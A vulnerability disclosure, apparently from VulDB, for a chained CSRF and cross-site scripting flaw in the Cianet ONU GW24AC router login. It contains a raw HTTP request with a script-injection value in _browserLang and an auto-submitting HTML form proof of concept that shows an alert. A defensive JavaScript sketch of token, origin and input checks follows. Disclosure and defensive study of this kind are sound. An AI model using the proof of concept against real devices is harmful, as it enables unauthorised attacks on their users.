| Title | Cianet ONU GW24AC Cross-Site Request Forgery |
|---|
| Description | This vulnerability allows you to take advantage of the browserLang parameter to inject malicious code and use the fact that there is no CSRF token for the login request, allowing you to concatenate the CSRF vulnerability with XSS. To reproduce, simply save the HTML code provided below in a .html file and open it in your browser, which will show the alert prompt as proof of concept.
# Request
POST / HTTP/1.1
Referer: https://x.x.x.x/
Content-Type: application/x-www-form-urlencoded
Content-Length: 173
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/x.x.x.x Safari/537.36
Host: x.x.x.x
Connection: Keep-alive
Frm_Logintoken=BzenyKyK&Password=u]H[ww6KrA9F.x-F&Username=BzenyKyK&_browserLang=19409"();}]9074"></script></script><script>alert('c4ng4c3ir0')</script>&_lang=1&action=login&frashnum=1
# CSRF HTML
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<form action="https://x.x.x.x/" method="POST">
<input type="hidden" name="Frm_Logintoken" value="BzenyKyK" />
<input type="hidden" name="Password" value="u]H[ww6KrA9F.x-F" />
<input type="hidden" name="Username" value="BzenyKyK" />
<input type="hidden" name="_browserLang" value="19409&quot;();}]9074&quot;&gt;&lt;/script&gt;&lt;/script&gt;&lt;script&gt;alert(9)&lt;/script&gt;" />
<input type="hidden" name="_lang" value="1" />
<input type="hidden" name="action" value="login" />
<input type="hidden" name="frashnum" value="1" />
<input type="submit" value="Submit request" />
</form>
<script>
history.pushState('', '', '/');
document.forms[0].submit();
</script>
</body>
</html>
|
|---|
| User | c4ng4c3ir0 (UID 38456) |
|---|
| Submitted | 2025-01-27 05:22 AM (1 year ago) |
|---|
| Moderation | 2025-01-30 09:29 AM (3 days later) |
|---|
| Status | Accepted |
|---|
| VulDB Entry | 294055 [Cianet ONU GW24AC up to 20250127 Login browserLang cross-site scripting] |
|---|
| Points | 17 |
|---|
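The two weaknesses the description chains (a login POST accepted from any origin, and `_browserLang` reflected without encoding) map to three server-side checks, sketched here as an added example that is not the vendor's or the submitter's code. The `csrf_token` field name, the language-tag pattern and the sample requests are assumptions constructed for illustration.

```javascript
// Assumption: the UI language is a short tag such as "en" or "pt-BR".
const LANG_RE = /^[A-Za-z]{2,3}(-[A-Za-z0-9]{2,8})?$/;

// Compare the submitted token with the session's token without an early exit.
function tokenMatches(submitted, expected) {
  const a = String(submitted ?? ''), b = String(expected ?? '');
  if (a.length === 0 || a.length !== b.length) return false;
  let diff = 0;
  for (let i = 0; i < a.length; i++) diff |= a.charCodeAt(i) ^ b.charCodeAt(i);
  return diff === 0;
}

// True only when Origin (or Referer as a fallback) names the same host as Host.
function sameOrigin(headers) {
  const src = headers.origin || headers.referer;
  if (!src) return false;
  try { return new URL(src).host === headers.host; } catch { return false; }
}

// Returns the reasons to reject a login POST; an empty array means accept.
// "csrf_token" is a hypothetical field name, not one taken from the device.
function checkLogin(headers, rawBody, sessionToken) {
  const p = new URLSearchParams(rawBody);
  const reasons = [];
  if (!sameOrigin(headers)) reasons.push('cross-origin');
  if (!tokenMatches(p.get('csrf_token'), sessionToken)) reasons.push('bad-token');
  if (!LANG_RE.test(p.get('_browserLang') ?? '')) reasons.push('bad-browserLang');
  return reasons;
}

// Encode a value for use inside a string literal in an inline <script> block.
function jsStringLiteral(value) {
  return JSON.stringify(String(value)).replace(/[<>&\u2028\u2029]/g,
    c => '\\u' + c.charCodeAt(0).toString(16).padStart(4, '0'));
}

// Constructed sample requests (host and token values are placeholders).
const FORGED = { headers: { host: '192.0.2.1', origin: 'https://other.example' },
  body: 'Username=u&Password=p&_browserLang=19409"></script><script>alert(9)</script>&action=login' };
const LEGIT = { headers: { host: '192.0.2.1', origin: 'https://192.0.2.1' },
  body: 'csrf_token=tok-constructed&Username=u&Password=p&_browserLang=pt-BR&action=login' };

console.log(checkLogin(FORGED.headers, FORGED.body, 'tok-constructed'));
console.log(checkLogin(LEGIT.headers, LEGIT.body, 'tok-constructed'));
console.log(jsStringLiteral('"></script><script>'));
```

The allow-list rejects the parameter before it is stored or echoed, while `jsStringLiteral` covers the case where a value must still be written into a script context.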